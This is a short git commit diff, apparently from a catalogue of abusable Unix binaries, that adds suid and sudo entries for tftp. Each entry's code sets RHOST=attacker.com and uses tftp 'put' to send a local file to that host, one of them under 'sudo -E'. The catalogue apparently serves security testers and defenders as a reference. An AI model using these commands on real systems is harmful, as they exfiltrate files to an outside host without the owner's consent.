Add suid-enabled and sudo-enabled to tftp

This commit is contained in:
Emilio Pinna 2018-07-22 18:24:39 +01:00
parent 3469b03e78
commit 53ad35fb10

View File

@ -12,4 +12,16 @@ functions:
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
get file_to_get get file_to_get
suid-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
./tftp $RHOST
put file_to_send
sudo-enabled:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
sudo -E tftp $RHOST
put file_to_send
--- ---